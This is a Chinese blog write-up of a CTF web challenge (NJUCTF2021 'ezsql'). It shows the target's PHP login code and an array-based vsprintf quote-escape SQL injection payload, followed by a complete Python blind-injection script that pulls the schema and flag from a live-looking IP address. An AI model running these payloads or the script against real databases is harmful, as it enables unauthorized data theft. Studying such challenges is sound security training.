【网络安全】php vsprintf格式化字符串逃逸sql语句引号(njuctf2021 ezsql wp)

最新推荐文章于 2024-08-17 22:56:29 发布
最新推荐文章于 2024-08-17 22:56:29 发布
阅读量137 收藏
点赞数
文章标签: php web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_41678158/article/details/128530439
版权

登陆界面。访问129.211.173.64:3080/www.zip 可以得到源码

config.php(这是用来连数据库的,没啥用,就不贴了)

login.php

<?php
include_once('config.php');
?>
<!DOCTYPE html>
<html><head><title>There is no absolutely safe system</title></head><body>
<?php
if (isset($_POST['password'])){$query = db::prepare("SELECT * FROM `users` where password=md5(%s)", $_POST['password']);if (isset($_POST['name'])){$query = db::prepare($query . " and name=%s", $_POST['name']);}else{$query = $query . " and name='benjaminEngel'";}$query = $query . " limit 1";$result = db::commit($query);if ($result->num_rows > 0){die('NCTF{ez');}else{die('Wrong name or password.');}
}
else{?><form action="login.php" method="post"><input name="name" id="name" placeholder="benjaminEngel" value=bejaminEngel disabled><input type="password" name="password" id="password" placeholder="Enter password"><button type="submit">Submit</button></form>
<?php 
}
?></body>
</html>

DB.php

<?php

class DB{private static $db = null;public function __construct($db_host, $db_user, $db_pass, $db_database){static::$db = new mysqli($db_host, $db_user, $db_pass, $db_database);}static public function buildMySQL($db_host, $db_user, $db_pass, $db_database) {return new DB($db_host, $db_user, $db_pass, $db_database);}public static function getInstance(){return static::$db;}public static function connect_error(){return static::$db->connect_errno;}public static function prepare($query, $args){if (is_null($query)){return;}if (strpos($query, '%') === false){die('%s not included in query!');return;}// get args$args = func_get_args();array_shift( $args );$args_is_array = false;if (is_array($args[0]) && count($args) == 1 ) {$args = $args[0];$args_is_array = true;}$count_format = substr_count($query, '%s');if($count_format !== count($args)){die('Wrong number of arguments!');return;}// escapeforeach ($args as &$value){$value = static::$db->real_escape_string($value);}// prepare$query = str_replace("%s", "'%s'", $query);$query = vsprintf($query, $args);return $query;}public static function commit($query){$res = static::$db->query($query);if($res !== false){ return $res;}else{die('Error in query.');}}
}
?>

审计代码的逻辑,进行了两次格式化字符串,密码还用md5()包裹,而且每次都用单引号把%s闭合了,并且在替换%s前还用了real_escape_string($value)进行转义。(盯着这几个安全函数几个小时差点哭了555)

好吧好吧,还是有注入点的。这里用到了vsprint语句。在w3school可以查到它的例子

<?php
$number = 9;
$str = "Beijing";
$txt = vsprintf("There are %u million bicycles in %s.",array($number,$str));
echo $txt;
?>

也就是说,可以post数组来逃逸引号。先来看看正常的sql查询语句

SELECT * FROM `users` where password=md5(%s) and name=%s limit 1

其中两个%s就是post的账号和密码。

如果我们密码输入%s,name输入一个数组,第一个元素用来闭合md5并且注入再注释,第二个元素随便输,就能绕过了!

可以构造payload如下

name[0]=) or [bool] #&name[1]=a&password=%s 其中[bool]用来塞布尔值。

sql语句就会变为

SELECT * FROM `users` where password=md5() or [bool] #) and name=a limit 1

试一下postname[0]=) or 1=1 #&name[1]=a&password=%s

还有一半flag在数据库里边。用二分脚本跑盲注即可。这里有个坑,最后查details的时候表名要写成 `2021`.NcTF 其他任何形式都不行。脚本如下(当然不是我这个菜鸡写的啦)

import requests
#NCTF{3v3ryth1ng_not_fantast1c_:)}
#uname:admin
Ts = "NCTF{3v3ryth1ng_"
Fs = "Wrong"
url = "http://129.211.173.64:3080/login.php"
def SQL_injection(url) :res = ""for i in range(1,2000) :left = 32right = 128mid = (left + right) // 2while (left < right) :payload_database = ")or(ord(substr((select(database())),%d,1))>%d)#" % (i, mid)payload_all_database = ")or((ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1)))>%d)#" % (i, mid)payload_table = ")or((ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1)))>%d)#" % (i, mid)#4E635446NcTFpayload_cloumn = ")or((ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=0x4E635446)),%d,1)))>%d)#" % (i, mid)payload_info = ")or((ord(substr((select `fl@g` from `2021`.NcTF limit 0,1),%d,1)))>%d)#" % (i, mid)#2021.NcTF fl@gpayload = payload_infodata = {"name[0]" : payload, "name[1]" : "SilentE", "password" : "12%s34"}#urls = url + payloadresp = requests.post(url = url, data = data)#print(resp.text)if Ts in resp.text :left = mid + 1else :right = midmid = (left + right) // 2if (mid == 32) :breakres += chr(mid)print(res)print(res)

if __name__ == "__main__" :SQL_injection(url)
baidu_jingjing
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP vsprintf()函数格式化字符串操作原理解析
01-19
vsprintf() 函数把格式化字符串写入变量中。 与 sprintf() 不同,vsprintf() 中的参数位于数组中。数组元素将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入第一个数组元素,...
【渗透测试】命令执行漏洞
ssrf
08-07 833
一、原理 程序员使用脚本语言如PHP开发应用过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着一些问题。比如说速度慢,或者无法接触到系统底层,如果我们开发的应用,特别是企业级的应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些系统命令函数。 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。 二、漏洞危害 继承web 服务器权限,去执行系统命令 继承web 服务器权限,读写文件 反弹shell
SQL--逃逸字符
Mimo_YY的博客
11-30 972
逃逸字符 为什么要逃呢,因为 _ 直接查查不出来, 还有比如你想查个数据里带有%的,如果按照规写法:【like ‘%’】这样是查不出来你想要的数据的, 这时候就要用逃逸字符 举例: SELECT* FROM icsale t1 WHERE t1.FBillNo LIKE '%\_%' escape '\' 这个意思是查询含有 _ 的数据。 注:关于逃逸字符可以用\ %等 具体还有哪些能用或者不能用倒是没有特意试过 另外,题外话,触发器,很鸡肋,性能慢,不需要把触发器神化,一般都不常用的。 ...
phpvsprintf,PHP vsprintf()用法及代码示例
weixin_30143813的博客
04-13 562
PHP中的vsprintf()函数是一个内置函数,用于将数组值显示为格式化字符串。数组元素将插入到主字符串中的百分号(%)处。根据其格式将数组值显示为格式化字符串,并接受数组参数代替可变数量的参数。该函数返回格式化字符串。而vprintf()输出格式化字符串用法:vsprintf (format, arr_arguments)使用的参数:此函数采用两个参数,如下所述:format:它具有Req...
php替换不掉中文引号,php字符串中双引号替换问题
weixin_39775106的博客
03-11 111
$value='[\"050\",\"广东省\",\"GUANGDONG\"],[\"050020\",\"广州\",\"GUANGZHOU\"],[\"050030\",\"潮州\",\"CHAOZHOU\"],[\"050040\",\"东莞\",\"DONGGUAN\"],[\"050050\",\"佛山\",\"FOSHAN\"],[\"050060\",...
php 字符串百分号格式化,PHP vsprintf()函数格式化字符串操作原理解析
weixin_39548438的博客
03-18 137
实例把格式化字符串写入变量中:$number = 9;$str = "Beijing";$txt = vsprintf("There are %u million bicycles in %s.",array($number,$str));echo $txt;?>定义和用法vsprintf() 函数把格式化字符串写入变量中。与 sprintf() 不同,vsprintf() 中的参数位于数组...
深入理解php printf() 输出格式化字符串
12-18
`printf()` 函数还有一系列相关的函数,如 `sprintf()` 可以将格式化字符串保存到变量中而不是直接输出,`vprintf()` 和 `vsprintf()` 可用于接收变量数组作为参数,而 `fprintf()` 则可以将格式化字符串输出到...
格式化字符串例子
08-15
printf,sprintf,sprintf_s,_snprintf_s,vsprintf,vsnprintf,_vsnprintf_s,_vscprintf格式化字符串使用与区别例子
解析php sprintf函数漏洞
Ramona的博客
12-18 1369
php sprintf函数漏洞 0x01 了解sprintf()函数 1,sprintf(),函数是php中的函数 2,作用是将格式化字符串写入变量中 3,函数形式为sprintf(format,arg1,arg2,arg++)      参数说明:       参数 描述 format 必需。规定字符串以及如何格式化其中的变量。 可能的格式值: ...
文件上传-.user.ini利用
feiwujiushiwo的博客
08-13 258
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
RabbitMQ-消息队列之routing使用
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
08-17 159
RabbitMQ-消息队列之routing使用
思科RIP动态路由配置3
2302_76730689的博客
08-14 652
路由信息协议(Routing Information Protocol,RIP)是应用较早、使用较普遍的动态路由协议,也是内部网关协议,由于RIP以跳数作为衡量路径的开销,且规定最大跳数为15,因此RIP在实际应用中是有一定限制的,通常适用于中小型的企业网络。Router-A(config-router)#network 网段!#9查看Switch-A、Router-A、Router-B的路由表。#3配置Router-A的名称及其接口IP地址。#7在Router-A上配置动态RIP。
wordpress网站“ERR_CONNECTION_REFUSED”错误
最新发布
xiaoyuya
08-17 142
wordpress网站“ERR_CONNECTION_REFUSED”错误,是一个常见的wordpress错误。通过以上步骤,你应该能够诊断并解决WordPress中的“ERR_CONNECTION_REFUSED”错误。例如,最新的WordPress可能不支持PHP5.2,必须升级到PHP5.5或更高版本。如果WordPress无法连接到数据库,也会导致类似的错误。如果你使用的是云服务器,可以尝试重启服务器来解决问题。如果连接没有问题,尝试重新启动路由器或重新连接网络。有时浏览器缓存可能导致连接问题。
PHP多项目多场景排队叫号系统源码
2401_84414018的博客
08-16 394
多项目多场景排队叫号系统的出现,不仅极大地改善了顾客的等待体验,也提升了服务机构的工作效率和管理水平。它让等待不再是一种负担,而是一种高效有序的享受。未来,随着技术的不断进步和应用场景的不断拓展,相信多项目多场景排队叫号系统将会为更多行业带来便捷和高效。让我们一起期待更加美好的智能服务时代吧!🚀🌟。
[Zer0pts2020]Can you guess it?1
kw741951的博客
08-17 124
打开题目看到信息随便输入一个数,显示错误查看源代码看到php代码,代码审计phpexit();} else {?= $message?>php }?
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 330
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
搭建高可用OpenStack(Queen版)集群(十二)之启动一个实例
happy_king_zi的博客
08-13 804
我这边只有一个测试网络,就选它了(他也是默认网络))点击下一项,允许实例添加scheduler hint(可以选择,也可以直接创建)(我这边直接跳过了)点击下一项,允许实例添加元数据(可选择,也可自己设定)(我这边直接跳过了)左边选项:项目 --> 网络 --> 网络子项(可见刚才命令创建的网络)点击下一项,选择服务器组(我这边没有设定,所有没有,直接跳过)点击下一项,选择网络端口,图如下(我这边没有设定,直接跳过了)左边选项:项目 --> 网络 --> 路由(设置网关)点击创建实例,下面是创建实例过程。
【社区团购系统设计】
商城 / Java 商城 -首选 商城 开源 电商 商城 源码 商城
08-14 404
社区团购系统的设计需要考虑多个方面,包括用户体验、功能模块、技术架构、安全性、可扩展性等。社区团购系统的设计和实现是一个复杂的过程,需要多个团队协作完成。务必保持系统的模块化和灵活性,以便未来可以轻松地进行扩展和维护。
nginx常用配置详解
简单,坚持
08-17 488
本文先按结构介绍nginx的配置,然后按需要实现的功能来介绍相应的配置方法。
为什么会有格式化字符串漏洞
05-11
为了避免格式化字符串漏洞,程序需要正确地对格式化字符串函数的参数进行转换和检查,可以使用函数如snprintfvsprintf等来代替不安全的sprintf函数,或者使用格式化字符串函数的安全版本,如printf_s、sprintf_s等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值